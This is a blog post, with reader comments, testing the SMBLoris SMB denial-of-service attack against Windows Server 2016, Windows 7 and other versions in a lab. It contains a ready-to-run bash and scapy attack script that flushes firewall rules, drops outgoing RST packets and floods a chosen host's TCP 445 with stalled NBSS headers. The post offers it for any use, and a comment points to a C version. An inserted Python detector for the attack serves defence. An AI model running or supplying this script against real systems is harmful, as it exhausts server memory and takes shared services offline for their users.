SMBLoris on Windows – tests

Last weekend some interesting news came out of DEFCON 25 about a new SMB Denial of Service attack, technically similar to the notorious Slowloris attack against Apache.

Please refer to the following page for more information about SMBLoris.

There was also some information available in Sam Bowne's YouTube post here.

I have transferred the demonstration from his video into a single script to play around with; save it however you wish ….

echo "***************************************************************"
echo " MS Windows SMB Remote DOS - need access to TCP 445 "
echo " Thx to Sam Bowne & DEFCON 25 " 
echo "***************************************************************"
echo "[*] Checking if python-scapy module is installed "
python -c "import scapy"
if [ $? -ne 0 ]; then 
echo "[-] Scapy not found please run apt-get install python-scapy"
exit 1
fi
echo "[*] Scapy found "
echo "[*] Setting iptables to stop RST packets "

iptables -F 
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

echo -e "Remote Windows SMB host IP ? \c"
read ip 
echo -e "How many threads are we gonna use ? [90000 is good] : \c"
read threads

echo 'from scapy.all import *' > 
echo 'import sys' >> 
echo '' >>
echo 'p0 = int(sys.argv[1])' >> 
echo '' >>
echo 'conf.L3socket' >>
echo 'conf.L3socket=L3RawSocket' >>
echo '' >>
echo 'i = IP()' >> 
echo -n 'i.dst = "' >>
echo -n $ip >> 
echo '"' >>
echo 't = TCP()' >> 
echo 't.dport = 445' >> 
echo '' >>
echo -n 'for p in range(p0,p0+' >> 
echo -n $threads >> 
echo '):' >> 
echo ' print p' >> 
echo ' = p' >> 
echo ' t.flags = "S"' >> 
echo '' >>
echo ' r = sr1(i/t)' >> 
echo ' rt = r[TCP]' >>
echo ' t.ack = rt.seq + 1' >> 
echo ' t.seq = rt.ack' >> 
echo ' t.flags= "A"' >> 
echo " sbss = '\x00\x01\xff\xff'" >> 
echo ' send(i/t/sbss)' >> 
ls -la
echo "[*] Running SMB DOS against $ip" 
sleep 2
python 0 & 
python 1000 &
python 2000 &
python 3000 &
python 4000 &
python 5000 &
python 6000 &
python 7000 &
python 8000 &
python 9000 &

The script is pretty self-explanatory, feel free to do whatever you want with it.
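The attack above works because every connection sends the 4-byte NetBIOS Session Service header 00 01 ff ff, whose length field promises a 131071-byte message that never follows, so the server keeps a large buffer allocated per connection. As an added detection-side example (not part of the original post or the script), the following parses that header and flags sources that open many such connections; the thresholds and sample segments are constructed for the example.

```python
"""Flag SMBLoris-style NBSS headers: a declared length near the 17-bit
maximum with almost no payload behind it, repeated from one source.
Thresholds and sample segments below are assumptions for this example."""
import struct
from collections import Counter

NBSS_LEN_MASK = 0x1FFFF   # 1 reserved bit + 16 length bits after the type byte
NBSS_SESSION_MESSAGE = 0x00


def parse_nbss_header(data):
    """Return (msg_type, declared_len) from a 4-byte NBSS header, or None."""
    if len(data) < 4:
        return None
    msg_type = data[0]
    declared_len = struct.unpack(">I", data[:4])[0] & NBSS_LEN_MASK
    return msg_type, declared_len


def is_suspicious(segment, min_declared=0x10000, max_body=64):
    """True when the header announces at least min_declared bytes but fewer
    than max_body bytes actually follow it in the same segment."""
    header = parse_nbss_header(segment)
    if header is None:
        return False
    msg_type, declared_len = header
    body_len = len(segment) - 4
    return (msg_type == NBSS_SESSION_MESSAGE
            and declared_len >= min_declared
            and body_len < max_body)


def flag_sources(segments, per_ip_threshold=50):
    """segments: iterable of (src_ip, first payload bytes) per TCP connection.
    Return {src_ip: count} for sources with at least per_ip_threshold
    suspicious connections; one such segment is harmless, thousands are not."""
    counts = Counter(ip for ip, seg in segments if is_suspicious(seg))
    return {ip: n for ip, n in counts.items() if n >= per_ip_threshold}


# Constructed samples: the SMBLoris header, and a normal-looking SMB request
# whose declared length (0x2f = 47) matches the bytes that actually follow.
SMBLORIS_SEGMENT = b"\x00\x01\xff\xff"
BENIGN_SEGMENT = b"\x00\x00\x00\x2f" + b"\xffSMB" + b"\x00" * 43

if __name__ == "__main__":
    sample = [("10.0.0.5", SMBLORIS_SEGMENT)] * 60 + [("10.0.0.9", BENIGN_SEGMENT)] * 5
    print(flag_sources(sample))   # {'10.0.0.5': 60}
```

In practice the per-connection count would be fed from a flow record or a capture of the first segment after the TCP handshake, and the thresholds tuned to the host's normal SMB client population.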

Here are my test results and videos for each of the Windows platforms I have run this script against. I was using VirtualBox on Linux with internal networking. Bear in mind that you need access to TCP 445 on the remote host for this to work, so check your firewalls ;)

Windows Server 2016 – latest patches installed

    • Memory was slowly being eaten, but after a while it gets released and starts to grow again. This could have an impact if more hosts were sending this attack simultaneously.
    • Below you can see the video of the test performed

Windows 2010 x64  – latest patches installed

    • Same behavior observed as with Windows Server 2016; as expected.
    • Below you can see the video of the test performed

Windows 7 SP1 x64 – latest patches installed

    • Here the system was brought to its knees at one point; had I run this attack from one more virtual machine, the box would have had a hard time.
    • Below you can see the video of the test performed


Windows Server 2003 R2 x64 – whatever patches were available back then

    • Actually pretty stable during the attack :)
    • Below you can see the video of the test performed

That's it!

P.S. I have tried this against Samba on Linux … no problem so far, but I would not be so sure; this has potential for abuse. The same goes for NFS/RPC … let's see what time brings.


About astr0baby


5 Responses to SMBLoris on Windows – tests

  1. zimmaro says:

    hi!!!
    ALL ALWAYS thanks for sharing!!! In the script, in the line:
    echo -n 'for p in range(p0,p0+' >> after watching the YouTube video "link" I've added +700:
    echo -n 'for p in range(p0,p0+700' >>
    and in my Kali it SEEMS to work fine… is it correct??
    thanks again!

  2. FREE says:

    Nice blog, followed you, go on with it :DD

  3. RipperFox says:

    Try this C implementation and see how many seconds your server lasts:

  4. Kurt says:

    Any particular reason for using the "iptables -F" command instead of "iptables -F OUTPUT"?
